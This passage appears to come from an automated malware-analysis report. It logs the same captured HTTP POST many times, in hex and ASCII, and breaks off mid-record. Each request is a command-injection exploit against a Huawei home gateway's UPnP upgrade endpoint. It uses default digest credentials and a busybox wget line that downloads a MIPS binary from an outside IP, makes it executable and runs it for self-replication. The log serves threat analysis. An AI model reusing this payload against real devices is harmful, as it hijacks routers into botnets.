65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 